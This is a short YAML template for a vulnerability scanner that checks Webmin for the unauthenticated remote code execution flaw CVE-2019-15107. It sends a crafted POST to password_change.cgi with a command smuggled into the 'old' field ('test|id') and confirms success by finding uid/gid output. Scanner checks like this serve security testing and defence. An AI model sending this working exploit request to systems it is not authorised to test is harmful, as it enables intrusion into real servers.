id: webmin-rce
info:
  name: Webmin Unauthenticated Remote Code Execution (CVE-2019-15107)
  risk: Critical

params:
  - root: "{{.BaseURL}}"

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}/password_change.cgi
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
      - Referer: '{{.BaseURL}}/session_login.cgi'
      - Cookie: redirect=1; testing=1; sid=x; sessiontest=1
    body: |
      user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
    detections:
      - >-
        StatusCode() == 200 && StringSearch('response', 'uid=') && StringSearch('response', 'gid=')

reference:
  - link: https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107/README.md
